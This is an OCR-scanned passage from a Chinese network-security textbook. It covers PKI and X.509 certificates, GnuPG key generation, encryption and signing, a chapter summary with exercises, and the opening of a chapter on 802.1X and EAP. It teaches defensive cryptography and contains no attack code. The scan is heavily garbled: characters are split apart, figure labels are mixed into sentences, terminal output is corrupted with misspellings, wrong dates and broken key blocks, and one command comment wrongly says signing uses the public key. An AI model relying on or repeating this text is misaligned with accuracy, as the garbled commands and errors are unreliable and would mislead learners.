Seq) ,并 与 Ticketres 一 起 发 送 给 TGS 服务 器 ,认证 信息 中 的 TS2 为 时 间 戳 ,用 于 防止 重 
放 攻 击 ,Subkey 为 C 生成 的 会 话 密 钥 ,Seq 为 随机 数 表 示 会 话 的 起 始 报 文 序号 。 

(7)V 使 用 Kcv 加 密 TS2 和 会 话 密 钥 Subkey, 生 成 Ekcv (TS2,Subkey,Seq) 并 发 给 
C,C 即 可 验证 服务 器 V 的 身份 。 


9.4 PKI 


PKI(Public Key Infrastructure) 是 利用 公 钥 理论 和 技术 ,为 网 络 数 据 和 其 他 资源 提 
供 信息 安全 服务 的 基础 设施 。PKI 采用 证 书 管理 公 钥 ,通过 认证 机 构 (Certificate 
Authority,CA) 把 用 户 的 公 钥 和 其 他 标识 信息 绑 定 , 实 现 用 户 身 份 验证 。 目 前 通常 采用 
X. 509 数字 证 书 对 网 络 信息 进行 加 密 和 签名 ,保证 传输 的 保密 性 、 完 整 性 和 不 可 否认 性， 
























































从 而 实现 安全 传输 。 
图 9-33 给 出 了 X. 509 证 书 V3 的 格式 ,主要 包括 : [证 书 序 让 号 | 
(1) 版本: 不同 版 本 的 证 书 格式 不 同 ; | 
(2) 序列 号 : 相同 CA 签发 的 唯一 证 书 序列 号 ; | 参数 
(3) 算法 标识 符 : 指明 具体 的 签名 算法 的 编号 和 发 行者 名 称 
相关 参数 ; 有 效 期 [| 
(4) CA 标识 : CA 的 名 称 和 CA 的 标识 ID; 结束 时 间 
(5) 有 效 期 : 表示 证 书 的 签发 时 间 和 过 期 时 间 ， 二 对 包公 
(6) 持 有 人 标识 : 持 有 人 名 称 和 持 有 人 的 标识 ID 主体 的 公 2 
(7) 公 钥 : 证 书 持 有 人 的 公 钥 ， 名 信息 | | 
(8) 签名 : CA 对 证 书 的 签名 。 | 过 行 者 唯一 标识 答 | 
PKI 很 好 地 解决 了 对 称 密码 技术 中 共享 密 钥 的 主体 唯一 标识 符 
分 发 管理 问题 ,在 具有 加 密 数 据 功能 的 同时 也 具备 数 扩展 
字 签名 功能 ,目前 已 形成 一 套 完整 的 互联 网 安全 解决 让 一 J。 算法 标识 符 
方案 。 一 个 典型 的 PKI 系统 包括 : 签名 [一 参数 
(1) PKI 策 略 : 定义 密码 系统 使 用 的 处 理 方法 和 SE 
原则 ,包括 如 何 管理 证 书 、 如 何 管理 密 钥 等 。 图 9-33 X. 509 证 书 格式 


(2) 认证 机 构 (CA): PKI 的 信任 基础 ,用 于 创 
建 .发 布 .维护 ,撤销 证 书 ,管理 公 钥 的 整个 生命 周期 。 

(3) 注册 机 构 (RA): 提供 用 户 和 CA 之 间 的 接口 .主要 功能 是 获取 并 认证 用 户 的 身 
份 , 向 CA 提出 证 书 申请 。 
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(4) 证 书 /CRL 发 布 系统 : 提供 证 书 的 在 线 浏览 .查询 和 用 户 注册 功能 。 

(5) PKI 应 用 接口 : 为 外 界 提供 安全 服务 的 入口 ,包括 公 钥 证 书 管理 接口 .CRL 的 发 
布 和 管理 接口 、. 密 钥 备份 和 恢复 接口 、 密 钥 更 新 接口 等 。 

图 9-34 是 PKI 的 基本 模型 ,PKI 是 创建 ,管理 ,存储 、 分 发 和 作废 证 书 的 一 系列 软件 、 
硬件 ,人员 、 策 略 和 过 程 的 集合 , 它 主 要 完成 以 下 功能 : 

(1) 为 用 户 生成 密 钥 对 ,包括 公 钥 和 私 钥 ,并 通过 安全 途径 分 发 给 用 户 ; 

(2) 认证 机 构 CA 为 用 户 签发 数字 证 书 ,CA 使 用 自己 的 私 钥 对 用 户 身 份 和 用 户 的 公 
钥 进行 绑 定 ,生成 证 书 分 发 给 需要 的 用 户 ; 

(3) 允许 用 户 对 数字 证 书 进行 有 效 性 验证 ; 

(4) 管理 用 户 数字 证 书 ,包括 发 布 证 书 、 撤 销 证 书 、 存 储 证 书 、 作 废 证 书 等 。 


目录 服务 器 LDAP 






































PKI 用 户 





图 9-34 PKI 认 证 体系 模型 


9.5 常用 软件 


PGP(Pretty Good Privacy) 是 一 个 基于 RSA 和 AES 等 加 密 算 法 的 加 密 软 件 系列 ， 
常用 的 版 本 是 PGP 专业 桌面 版 ,包含 邮件 加 密 与 身份 确认 文档 加 密 、 硬 盘 及 移动 盘 全 盘 
密码 保护 ,文件 安全 擦 除 等 众多 功能 ,最 终 版 本 是 PGP 10. 02Lbuild13] ,现在 已 经 被 赛 门 
铁 克 公司 收购 ,今后 将 以 安全 插件 的 形式 集成 于 诺顿 等 安全 产品 。 

GnuPG(GNU Privacy Guard,GPG) 是 Linux 下 基于 PGP 机 制 的 开源 加 密 及 签名 软 
件 , 是 实现 安全 通信 和 数据 存储 的 一 系列 工具 集 , 可 以 实现 数据 加 密 、 数 字 签名 ,在 功能 上 
和 PGP 相同 ,GnuPG 的 常用 指令 如 表 9-4 所 列 。 

表 9-4 ”GnuPG 常用 指令 选项 



































指 村 用 途 指 学 用 途 
--gen-key 生成 公 钥 和 私 钥 对 -e/--encrypt 加 密 文档 
--list-keys 显示 公 钥 列表 -d/--decrypt 解密 文档 
-K 显示 私 钥 列表 -s/--sign 签名 某 个 文档 
使 用 对 称 加 密使 文档 加 密 -v/--verify 签名 验证 
-a 生成 ASCII 码 形式 的 加 密 文档 ~-export 导出 密 钥 到 某 个 文档 
-u/--local-user | 指明 使 用 哪个 用 户 的 私 钥 签名 -r/--recipient 指明 公 钥 加 密 的 接收 方 
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GnuPG 的 可 执行 程序 是 gpg, 在 初始 生成 密 钥 对 后 , 即 可 实现 各 种 对 称 加 密 和 公 铀 
加 密 方 法 。 图 9-35 给 出 了 生成 密 钥 对 的 示例 ,用 户 可 以 选择 ECC 或 RSA 算法 、 选 择 密 
钥 长 度 , 要 求 用 户 必须 输入 足够 的 随机 字符 以 生成 足够 大 的 素数 。 














Qubur gen-key ET] 
ps (cnupo) Cor (ORT (C2815 Free software Foundatton， 
[rhts ts free software: you are free to change and redistribute 1 

ta the extent permttted by La 


lgpg: keyrtng */hone/fguotest/.gnupg/secring.gpg’ created 
pg /pubrtng. gpg’ created 


DA nd East 
DSA (stgn only) 


RSA (stgn only) yeppcAagaE 
ctton? OSA RECOR DE 4 t of randon bytes. It ts a good tdea to perforn 


A keys nay be between 1624 and 3672 btts long ~ nyboord, rove the rouse, ottltae the 
What keystze do you want? (2043) 7 EEKE2048 

IRequested keystze ts 

ass spectly how iong the key should be vattd 


ev ts 
key does not en 
rs thts correct 


es need a user ID to tdenttfy your key; the software constructs the user 
fron the Real Nane, Comnent and Enatl Address tn thts forn: 


Hetnrtch Hetne (Der Dtchter) <hetnrtchh@duesseldorf.de>" 
ewanr ewh lh lver onlewr fhdJf5afas 





图 9-35 gpg 生成 密 钥 对 示例 





在 密 钥 对 成 功 产 生 后 ,可 以 查看 和 导出 公 钥 和 私 钥 ,图 9-36 示例 如 何 查看 公 钥 和 私 
钥 , 图 9-37 示例 以 文本 形式 导出 公 钥 。GnuPG 默认 输出 是 二 进 制 形式 ,使 用 -a 选项 可 以 
产生 文本 输出 。 图 9-37 将 生成 的 公 钥 导出 ,并 生成 pub. key 文件 ， 里 面包 含 公 钥 的 文本 
信息 ,如果 要 导出 私 钥 信息 ,可 以 使 用 *--export-secret-keys” 














2048D/67D4EA1E 2617-67-64 
guofn <121171528@qq.com> 
2648g/8B69D6E3 2617-67-64 


:~$ gpg --Ltst-keys 


/home/fguotest/.gnupg/pubring. gpg 


2048D/67D4EA1E 2017-07-04 
guofn <121171528@qq.com> 
2048g9/BB09DOE3 2617-67-64 





图 9-36 ”查看 公 钥 和 私 钥 基本 信息 


GnuPG 最 常用 的 方式 是 实现 公 钥 加 密 和 数字 签名 ,图 9-38 给 出 了 对 “test. txt" 文 件 进 
行 公 钥 加 密 和 签名 ,以 及 相应 的 解密 和 签名 验证 过 程 。GnuPG 的 + 他 常用 加 密 指令 如 下 : 


gpg -e -runame -oefile file // 用 uname 的 公 钥 对 文件 file 加 密 ,生成 加 密 文件 efile 


gpg -onewfile -defile // 解 密 efile, 解 密 后 的 信息 产生 文件 newfile, 支持 对 称 密 钥 
// 和 私 钥 解密 

gpg -s -uuname -oefile file // 用 uname 的 公 钥 对 文件 file 签名 ,生成 签名 后 的 文件 efile 

gpg - o newfile - vefile // 对 文件 efile 进行 签名 验证 ,还 原 后 的 信息 产生 文件 
//newfile 

gpg -c -oefile file // 使 用 对 称 加 密 对 文件 进行 加 密 , 生 成 加 密 文件 efile, 密 钥 由 


// 用 户 输入 口令 生成 
gpg -c -s -uuname -oefile file // 对 文件 file 施加 对 称 加 密 , 并 用 uname 的 私 钥 签 
// 名 ,产生 加 密 文件 efile 
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t@ubuntu:~$ gpg --export -a >pub.key 
fF ubuntu:~$ cat pub.key 

-BEGIN PGP PUBLIC KEY BLOCK- 
ersion: GnuPG v1 


QMuBFLbQ/QRCACGZqyrTYqrmUskmwYvv/g2XxOEshLtdhyYjhehx3FkQ6tdN6Zz13 
lB/lwBQPyL+S5Xj1inCwimFy5as3gGPS6R3DfqnceG+OrrcVLDbMeO+sI4g1/KiCqvD 
apuysTwmzwvNNNnL8yFnoqejGMxjy+9tyN/uMg4dtIH55dQUUqnAqCCF3wjwwn8t 

zIqgy7f5tDRLioljyF8ktoDRHNnwi+ECK2zAedwIziwv1Iwc3bj8Vv8IS04V3ZnU 
jzwpsTB/iZTFIvksuM9kL8y80jFywe4E6p9BeJkPcUel1Lfhrb9MGX8R36]1cwMK8r 
KFMSTmwzH2Wh8s6Hqr tSXVEd]1x83SC28FmzAQDy6z1z+WTZ3hfv403pA7LCwvlc 
lizn3T4mV1wOEjAkOrwf+000gmtgl/aET/NayRMGqdzu2r fwacdbsPD6PjIFYhF4e 
fvRipzopKgkX5n42Hfonf jbFNIk/nGV8d8p6HASrcZbe6KQd3wQtRP8sazxof sua 
L8pwnfK2g3XBRx1YwLsBCLzRDjUefSLOrUJUWepLWw24+BI1MAtSSCRuWXVW2FAra 
INVQai1lGqlSap4rHqgGNJZmp46Eiq+UCq07BDyfbc99J22skRztEq9oULPCJ2FSvL 
lu4cgKGVkpGug19f tHxzmqke3VLtNdSR6dDb8g7GjH/OvbHh3Y2gQuSGSMhCxXaRE 
ozBxwkFDmpH9Luz6RgmWFmkzyG1PDKoIcundj9ePxgf/RoeUsTeFEVReoMN+PXj8 
和 PuA5HRRS2sY4CkdQPbz2erLvcQya05s5fsxGt6sZKGa3/+YyN2eBqfw5rT91EJVT 
26/RqhybJoxUYoYx90Z2i72YtrHvOEDVAFRuLgNLC+X+3b8ZFo8Tjl5ujp+000Xy 
kosRpPz6oTT6K]JUZHoHkuBKHtNTzpI/sPtu6SYo8Sazb9A3bFCOxbj++QDIsTtGWNE 
SGxsk24HKsJGT1txwQRjUHQHP/QXK9/1qxys9SNJsNJbYwaMLsfk+tLGojI7HtycJk 
esshr6cibqs/6jK3Gzvq6YfRNuNHGvZJzPt9jjIUNxINdMdAMPcKFx7UQggLmEa 

rQYZ3VvZm4gPDEyMTE3MTUyOEBxcS5jb26+tHoEExEIACIFALLbQ/QCGwMGCwkI 
lBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEOFSef1in100eInIA/3BLskSH275Y3X20 
loFNknOscGMeZpWghhSo61tsUbI3aAP9XzTAirfWYpMzzHSNT33UUQU2egj6rGrzw 
[76fylnIyWrkCDQRZWOPOEAgAQuO4FLfBa6RZVc /wbIRKAIXuFNpONWopo1+0AVwn 
lyEeJ60]]J+OuI6dhw/F4rk8aQhtekVcBMp/B1Q0jegG4iXopaXnni lSKIHbqtdNH 





图 9-37 导出 并 查看 公 钥 的 具体 信息 


buntu:~h$ gpg -e -r guofn -s -u guofn -a -0 test.gpg test.txt 


ou need a passphrase to unlock the secret key for 
ser: "guofn <121171528@qq.com>" 
648-btt DSA key, ID 67D4EA1E, created 2617-67-64 


le ‘test.gpg' exists, Overwrite? (Y/N) y 
fr tu:~$|gpg -d -v test.gpg 
armor header: VerStonr ONOPO VI 
: public key ts BBO9DOE3 
: ustng subkey B869D6E3 instead of primary key 67D4EA1E 


need a passphrase to unlock the secret key for 
"guofn <121171528@qq.con>” ”输入 口 今 解锁 私 钥 . 用 干 解密 文 件 
ustng subkey BBO9DOE3 instead of primary key 67D4EA1E 
-btt ELG-E key, ID BBO9DOE3, created 2017-87-04 (matn key ID 67D4EA1 


: encrypted with 2048-bit ELG-E key, ID BBO9DOE3, created 2617-67-64 
"guofn <1211715288qq.com>” 
AES256 encrypted data 
:original ftle nane='test.txt' 


Ts a test 文 
TSUOaUUTETSUerTUe69 Jul 2617 61:17:26 AM PDT ustng DSA key ID 67D 


ustng PGP trust modet 
Good stgnature from "guofn <121171528@qq.com>" 
: binary signature, digest algorithm SHA256 





图 9-38 ”GnuPG 实现 公 钥 加 密 和 数字 签名 示例 


示例 使 用 预先 建立 的 “guofn” 的 公 钥 对 文件 “test. txt” 进 行 加 密 , 并 使 用 “guofn” 的 私 
钥 对 加 密 文件 进行 签名 ,生成 的 文档 “test. gpg” 为 用 户 “guofn” 签 名 的 加 密 文档 ,该 文件 
可 以 被 任何 拥有 “guofn” 公 和 钥 的 用 户 验 证 ,但 是 只 能 由 “guofn” 解 密 , 因 为 只 有 使 用 
“guofn” 的 私 钥 才 可 以 解密 文档 。 需 要 注意 的 是 ,在 使 用 私 钥 之 前 ,GnuPG 提示 要 求 输入 
口令 解锁 私 钥 。 因 为 整个 GnuPG 体制 的 安全 性 建立 在 私 钥 的 安全 性 之 上 ,所 以 必须 对 
私 钥 进 行 保护 ,通常 的 做 法 是 使 用 AES 算法 对 私 钥 进 行 加 密 , 加 密 密 钥 根据 用 户 输 入 的 
口令 结合 伪 随 机 数 生成 器 随机 生成 。 
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9.6 小 结 


密码 技术 是 网 络 安全 的 核心 基础 ,包括 加 /解密 算法 、 密 码 分 析 、 安 全 协议 、 密 钥 管 理 、 
身份 认证 和 数字 签名 等 。 

密码 学 诞生 于 1949 年 ,现代 加 密 技术 始 于 1976 年 。 当 前 ,密码 体制 分 为 对 称 加 密 
和 公 钥 加 密 体制 ,对 称 加 密 即 加 /解密 使 用 相同 密 钥 , 而 公 钥 加 密 加 /解密 使 用 不 同 密 
钥 。 对 称 加 密 算法 包括 分 组 加 密 和 流 加 密 ,分 组 加 密 主 要 有 DES、3DES 和 AES 等 算 
法 , 流 加 密 算 法 代表 是 RC4, 公 钥 加 密 算法 有 RSA、DSA 和 Diffie-Hellman 密 钥 交换 算 
法 等 。 

DES 的 密 钥 长 度 为 64 位 ,但 是 有 8 位 奇偶 校 验 位 ,因此 实际 密 钥 长 度 是 56 位 ,主要 
步骤 包括 IP 置换 和 逆 署 换 、16 轮 相 同和 迭代 的 函数 下 ,包括 扩展 置换 、S 盒 蔡 换 和 己 置换 
等 ,其 中 S 盒 替 换 是 唯一 的 非 线性 变换 。3DES 是 DES 算法 的 三 次 迭代 ,将 密 钥 扩展 到 
168 位 ,AES 支持 128、192 和 256 比特 的 分 组 长 度 。 

公 钥 算法 有 三 种 主要 应 用 : 加 密 解 密 、 数 字 签 名 和 密 钥 交 换 。RSA 算法 基于 大 整数 
分 解难 题 ,适用 于 所 有 三 种 应 用 ,DSA 只 适用 于 数字 签名 ,Diffie-Hellman 基于 离散 对 数 
难题 ,只 用 于 密 钥 交 换 。 

散 列 函数 具有 单 向 性 ,攻击 散 列 函数 包括 碰撞 性 攻击 和 弱 碰 撞 性 攻击 ,目前 还 没有 被 
公开 破解 的 函数 是 SHA, 它 包括 SHA-1、SHA-256、SHA-384 和 SHA-512, 其 中 SHA- 
512 的 输出 长 度 是 512 比特 , 穷 举 攻击 的 次 数 为 2 。 

基于 对 称 加 密 的 密 钥 分 配 通 常 由 KDC 实现 ,适用 于 小 型 网 络 。 基 于 公 钥 加 密 的 密 
钥 分 配 包括 公 钥 分 配 和 对 称 密 钥 分 配 两 方面 , 公 钥 分 配 通常 使 用 公 钥 证 书 实现 , 现 有 数字 
证 书 主要 是 X. 509; 对 称 密 钥 分 配 使 用 接收 方 的 公 钥 对 发 送 方 生成 的 随机 密 钥 进行 加 
密 , 然 后 发 送 给 接收 方 ,从 而 双方 可 以 获得 相同 的 对 称 密 钥 。 

消息 认证 有 三 种 方式 : 使 用 消息 认证 码 , 可 以 用 公 钥 加 密 、 对 称 加 密 和 散 列 函数 实 
现 ; @ 使 用 散 列 消息 认证 码 , 结 合 散 列 函 数 和 对 称 密 钥 实 现 ; @ 使 用 数字 签名 ,数字 签名 
主要 由 公 钥 加 密 技术 实现 ,保证 信息 的 完整 性 和 验证 发 送 方 的 身份 ,分 为 直接 数字 签名 和 
仲裁 数字 签名 。 

身份 认证 分 为 单机 身份 认证 和 网 络 身 份 认证 ,单机 身份 认证 包括 口令 、 智 能 卡 和 生物 
特征 等 ,网 络 身份 认证 通常 采用 认证 协议 实现 ,如 S-KEY 和 Kerberos 认证 协议 。S-KEY 
是 第 一 个 一 次 性 口令 技术 标准 ,Kerberos 是 基于 对 称 加 密 的 身份 认证 协议 。 

PKI 采用 证 书 管理 公 钥 ,通过 认证 机 构 (Certificate Authority, CA) 把 用 户 的 公 钥 和 
其 他 标识 信息 绑 定 ,实现 用 户 身份 验证 ,很 好 地 解决 了 对 称 加 密 的 密 钥 分 配 问题 。PKI 主 
要 包括 CA 注册 机 构 RA、 证 书 发 布 系统 CRL、 应 用 接口 和 PKI 策略 等 模块 。 

GnuPG(GNU Privacy Guard,GPG) 是 Linux 下 基于 PGP 机 制 的 开源 加 密 及 签名 软 
件 ,是 实现 安全 通信 和 数据 存储 的 一 系列 工具 集 。 
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习 题 


9-1 假设 DES 的 某 轮 迭代 的 32 位 输入 为 1100 0011 0000 1100 1011 0101 1000 0010， 
经 过 图 9-8 的 巨 扩 展 置 换 后 的 序列 是 什么 ? 当 扩 展 后 的 数据 直接 进入 S 盒 后 ,每 一 组 的 
6 比特 数据 经 过 图 9-9 的 S 盒 的 蔡 换 后 ,输出 的 4 比特 分 别 是 多 少 ? 

9-2 ”给 定 两 个 素数 17 和 19, 请 根据 RSA 算法 计算 出 相应 的 公 钥 和 私 钥 。 

9-3 请 简要 叙述 基于 公 钥 加 密 的 对 称 密 钥 分 配 过 程 。 

9-4 请 简要 叙述 Kerberos 协议 的 认证 过 程 。 

9-5 请 简要 叙述 Diffie-Hellman 密 钥 交换 协议 的 基本 原理 。 

9-6 请 简要 叙述 如 何 实现 对 S-KEY 认证 协议 的 穷 举 攻击 ,如 果 已 经 知道 用 户 密 钥 
是 6 位 数字 ,你 如 何 计 算出 该 密 钥 ? 

9-7 简要 叙述 数字 签名 的 基本 过 程 。 图 9-29 的 数字 签名 不 具有 保密 性 ,如 果 要 同 
时 实现 保密 性 和 数字 签名 ,如何 修改 图 9-29 的 结构 ? 

9-8 ”请 结合 公 钥 证 书 解释 我 国 第 二 代 居 民 身 份 证 的 实现 原理 ,请 解释 身份 证 读 卡 器 
如 何 验证 身份 证 的 真实 性 。 

9-9 ”GnuPG 是 开源 加 /解密 套件 。 

(1) 使 用 GnuPG 进行 签名 验证 时 ,用 户 是 否 需 要 输入 口令 ,为 什么 ? 

(2) 使 用 GnuPG 进行 对 称 加 密 和 签名 时 ,用户 需要 输入 几 次 口令 ,为 什么 ? 

(3) 每 次 输入 的 口令 是 不 是 必须 相同 ? 请 解释 原因 。 

(4) 相应 的 解密 过 程 需要 输入 几 次 口令 ? 为 什么 ? 
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学 习 要 求 : 

。 了 解 链 路 层 802. 1X 和 EAP 协议 的 基本 原理 和 作用 。 

。 掌握 IPSec 协议 族 的 基本 组 成 ,包括 SA、AH、ESP 协议 的 详细 机 制 。 
。 理解 IPSec IKE 协议 的 密 钥 交换 过 程 。 

。 掌握 SSL 记录 协议 和 握手 协议 的 机 制 ,理解 SSL 的 安全 保证 机 制 。 
。 掌握 TKIP 和 CCMP 协议 加 密 机 制 ,理解 相应 的 安全 保证 机 制 。 

。 理解 802. 11i 协议 族 建 立 安 全 关联 的 过 程 。 

。 掌握 WPA2/PSK 无 线 破解 的 基本 原理 和 实现 方法 。 


TCP/IP 协议 族 在 设计 时 并 没有 考虑 安全 性 问题 ,后 来 虽然 经 过 许多 次 改进 ,但 是 仍 
然 没 有 彻底 解决 安全 性 问题 。 信 息 在 传输 过 程 中 的 安全 性 无 法 保证 。 接 收 方 无 法 确认 发 
送 方 的 身份 ,也 无 法 判定 接收 到 的 信息 是 否 与 原始 信息 相同 。 

因此 ,网 络 安全 研究 人 员 在 链 路 层 、 网 络 层 和 传输 层 开发 了 相应 的 安全 补充 协议 ,期 
望 在 各 个 层次 上 分 别 达 到 保密 性 、 完 整 性 和 不 可 抵赖 性 的 安全 目标 。802. 1X 和 EAP 协 
议 用 于 在 链 路 层 上 实现 发 送 方 身份 认证 ,IPSec 和 SSL 分 别 在 网 络 层 和 传输 层 利用 密码 
技术 实现 了 三 个 基本 安全 目标 ,802. 11i 协议 族 定义 无 线 局 域 网 WLAN 的 加 密 和 完整 性 
检测 机 制 。 


10.1 802.1X 和 EAP 


802. 1 X 属于 链 路 层 认 证 机 制 , 它 是 一 种 基于 端口 的 接 人 控制 协议 ,目的 在 于 确定 连 
接 主机 的 端口 是 否 有 效 , 有 效 则 表示 交换 机 可 以 转发 从 该 端口 输入 /输出 的 数据 ,例如 对 
拨号 用 户 上 网 的 认证 过 程 就 是 确定 远程 用 户 接 人 设备 和 主机 之 间 语 音信 道 的 有 效 性 的 
过 程 。 
判定 802. 1X 协议 的 初衷 是 为 了 解决 无 线 局 域 网 用 户 的 接 和 人 认证 问题 ,IEEE 802. 3 
协议 定义 的 局 域 网 并 不 提供 接 入 认证 ,只 要 用 户 能 接 入 局 域 网 控制 设备 (如 交换 机 ) 就 可 
以 访问 局 域 网 中 的 设备 或 资源 。 随 着 局 域 网 接 入 的 日 益 流 行 ,有 必要 对 交换 机 端口 加 以 
控制 以 实现 用 户 级 的 接 入 控制 ,802. 1X 就 是 为 了 实现 基于 端口 的 接 人 控制 而 定义 的 一 个 
标准 , 它 通 过 扩展 认证 协议 (Extensible Authentication Protocol,EAP) 完 成 对 接 人 用 户 
的 认证 ,EAP 报 文 封装 成 局 域 网 的 帧 格式 (EAP over LAN,EAPOL) 在 用 户 和 认证 服务 
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器 之 间 传 输 。 
10,1: 1 302. 1X 


IEEE 802. 1X 是 IEEE 制定 的 关于 用 户 接 入 网 络 的 认证 标准 ,全 称 是 “基于 端口 的 网 
络 接 入 控制 ”, 运 行 于 网 络 中 的 链 路 层 , 既 可 以 是 以 太 网 LAN, 也 可 以 是 无 线 以 太 网 
WLAN。 它 具 有 完备 的 用 户 认证 和 管理 功能 ,基于 C/S 方 式 实现 访问 控制 和 身份 认证 ， 
用 于 限制 未 经 授权 的 用 户 通过 接 入 端口 访问 LAN/WLAN。 在 用 户 可 以 访问 网 络 之 前 ， 
802. 1X 对 连接 到 交换 机 端口 上 的 用 户 进 行 认证 。 在 认证 通过 之 前 ,802. 1X 只 允许 
EAPOL( 基 于 局 域 网 的 扩展 认证 协议 ) 报 文通 过 交换 机 端口 ,只 有 认证 通过 后 ,用 户 访问 
网 络 的 报 文才 可 以 通过 以 太 网 端口 。 

802. 1 X 协议 的 主要 特点 如 下 : 

(1) 链 路 层 协 议 , 不 需要 到 达 网 络 层 ; 

(2) 使 用 扩展 认证 协议 EAP 实现 身份 认证 ,提供 了 良好 的 扩展 性 和 适应 性 ,实现 了 
PPP 认证 的 兼容 ; 

(3) 采用 “可 控 端口 "和 “不 可 控 端 口 " 的 逻辑 功能 ,从 而 可 以 实现 数据 与 认证 的 分 离 ， 
由 不 可 控 的 逻辑 端口 完成 对 用 户 的 认证 与 控制 ,数据 报 文通 过 可 控 端口 进行 交换 ,通过 认 
证 之 后 的 报 文 无 须 封 装 ; 

(4) 可 以 映射 不 同 的 用 户 认 证 等 级 到 不 同 的 VLAN; 

(5) 可 以 使 交换 端口 和 无 线 LAN 具有 安全 的 认证 接 入 功能 。 

802. 1 X 的 认证 机 制 与 应 用 层 认 证 机 制 的 目的 不 同 , 它 仅仅 用 于 确定 连接 用 户 的 物 
理 或 逻辑 链 路 的 有 效 性 ,认证 成 功 则 链 路 有 效 , 不 需要 在 随后 的 报 文中 再 次 验证 发 送 方 的 
身份 。 

802. 1 X 的 操作 模型 如 图 1-10 所 示 , 每 个 物理 端口 被 虚拟 化 为 两 个 迎 辑 端口 , 受 控 
端口 只 有 在 通过 认证 通过 后 , 才 提 供 正 常 的 数据 转发 功能 ; 非 受 控 端口 用 于 接收 EAPOL 
报 文 和 广播 报 文 。 交 换 机 通常 作为 中 继 系统 ,在 用 户 和 认证 服务 器 之 间 转 发 报 文 ,但 是 它 
有 时 也 可 以 作为 认证 服务 器 直接 完成 用 户 认 证 。 受 控 端 口 在 完成 认证 前 ,处 于 非 授权 状 
态 ,无 法 转发 数据 ,只 有 通过 认证 后 ,才能 从 非 授权 状态 转变 为 授权 状态 。 

802. 1 X 具体 工作 流程 如 下 (图 10-1) : 

(1) 用 户 开启 802. 1X 客户 端 ,输入 已 经 申请 和 登记 的 用 户 名 和 口令 ,发 起 连接 请 求 ， 
客户 端 发 出 请 求 认证 的 链 路 层 帧 ,启动 认证 过 程 。 

(2) 交换 机 收 到 请 求 认 证 帧 后 ,响应 一 个 请 求 帧 ,要求 客 户 端 提 供用 户 名 。 

(3) 客户 端 将 包含 用 户 名 信息 的 数据 帧 发 送 给 交换 机 ,交换 机 将 该 帧 封装 处 理 后 发 
送 给 认证 服务 器 。 

(4) 认证 服务 器 收 到 帧 后 ,与 数据 库 中 的 用 户 信息 比较 ,获取 该 用 户 对 应 的 口令 信 
息 , 然 后 使 用 随机 生成 的 加 密 密 钥 对 它 进 行 加 密 处 理 , 同 时 也 将 该 加 密 密 钥 发 送 给 交换 
机 ,由 交换 机 转发 给 客户 端 。 

(5) 客户 端 收 到 由 交换 机 转发 的 加 密 密 钥 后 ,用 该 密 钥 对 口令 进行 加 密 , 并 通过 交换 
机 转发 给 认证 服务 器 。 
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SO" ©® 请 


认证 数据 库 
EAPOL-START 
|_EAPOL(EAP 请 求 (用 户 身份 )| 用 户 名 
EAPOL(EAP 响 应 (用 户 A)) 用 户 A Password 











EAPOL(EAP 请 求 (Key)) 


1 





EAPOL(EAP 啊 应 (Encryption(Key,Password))) 








EAPOL(EAP 响 应 (认证 成 功 ) 











图 10-1 802.1X 协 议 的 工作 流程 


(6) 认证 服务 器 将 收 到 的 加 密 口 令 和 第 (4) 步 计算 的 加 密 口 令 信息 进行 对 比 , 如 果 相 
同 , 则 认为 该 用 户 为 合法 用 户 ,发 送 认 证 通过 的 消息 ,并 向 交换 机 发 出 打开 端口 的 指令 ,多 
许 用 户 访问 网 络 ; 否则 ,发 送 认证 失败 的 消息 ,保持 交换 机 端口 的 关闭 状态 ,只 允许 
EAPOL 认证 信息 通过 。 

当 受 控 的 交换 机 端口 变 为 授权 状态 并 允许 访问 网 络 后 ,连接 在 该 端口 的 所 有 终端 都 
可 以 访问 网 络 , 这 实际 上 不 符合 接 和 人 控制 的 要 求 。 解 决 该 问题 的 方法 是 使 用 基于 MAC 
的 访问 控制 列表 ACL ,为 每 个 物理 端口 配置 ACL 或 者 每 个 端口 至 多 只 允许 一 个 MAC 
地 址 同时 访问 ,如 图 10-2 所 示 。802. 1X 交换 机 的 端口 2 变 为 授权 状态 后 ,主机 C 和 主机 
D 都 可 以 通过 端口 2 访问 网 络 ,但 是 如 果 端 口 1 变 为 授权 状态 ,根据 它 的 ACL 设置 ,只 有 
主机 A 才 可 以 访问 网 络 ,主机 B 则 不 行 。 









认证 服务 器 


10-2 基于 MAC ACL 的 802.1X 
10 EAP 


EAP 是 一 种 载体 协议 ,用 于 与 不 同 的 认证 协议 建立 绑 定 关系 。 它 与 应 用 的 环境 无 
关 , 仅 用 于 承载 和 传输 不 同 认证 协议 的 消息 。 所 有 不 同 的 应 用 环境 和 认证 协议 都 可 以 与 
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EAP 进行 绑 定 ,如 图 10-3 所 示 ,EAP 可 以 基于 不 同 的 物理 链 路 如 LAN、PPP 和 WLAN， 
也 可 以 承载 如 SSL、S-KEY 和 Kerberos 等 认证 协议 。 

EAP 的 操作 模型 如 图 10-4 所 示 ,认证 方 负责 对 用 户 进行 认证 ,用 户 只 有 通过 认证 才 
可 以 接 入 。 认 证 方向 用 户 发 送 请 求 报 文 ,用户 向 认证 方 回 送 响应 报 文 ,EAP 报 文 的 内 容 
与 具体 承载 的 认证 协议 有 关 。EAP 共有 4 种 报 文 类 型 ,分 别 是 请 求 , 响 应、 认证 成 功 和 认 
证 失败 , 报 文 格式 如 图 10-5 所 示 , 各 字段 含义 如 下 : 


用 户 认证 方 二 







































































请 求 
S-KEY | Kerberos SSL | 2 
T 1 响应 
EAP | 请 来 
i 
LAN | WLAN PPP | 加 认证 成 功 /失败 
图 10-3 EAP 的 作用 图 10-4 ”EAP 操作 模型 
1B 1B 2B 
编码 标识 符 长 度 数据 
1B | 
类 型 | ”类 型 相关 数据 
1 身份 


图 10-5 ”EAP 报 文 格式 


(1) 编码 : 1- 请 求 ,2- 响 应 ,3- 认 证 成 功 ,4- 认 证 失败 。 

(2) 标识 符 : 用 于 匹配 请 求 和 响应 报 文 ,必须 在 上 一 轮 请 求 响应 完成 后 ,才能 开始 下 
一 轮 请 求 响应 ,每 一 轮 的 请 求 和 响应 报 文 的 标识 符 相 同 。 

(3) 长 度 : 给 出 EAP 报 文 的 总 长 度 。 

(4) 数据 : 只 有 请 求 和 应 答 报 文才 有 数据 字段 ; 字段 的 第 一 个 字 节 表示 数据 的 类 型 ， 
与 具体 的 认证 协议 有 关 , 通 常 类 型 为 1 的 数据 用 于 获取 用 户 的 身份 信息 ,其 他 类 型 数据 用 
于 认证 用 户 身 份 。 


10.2 IPSec 


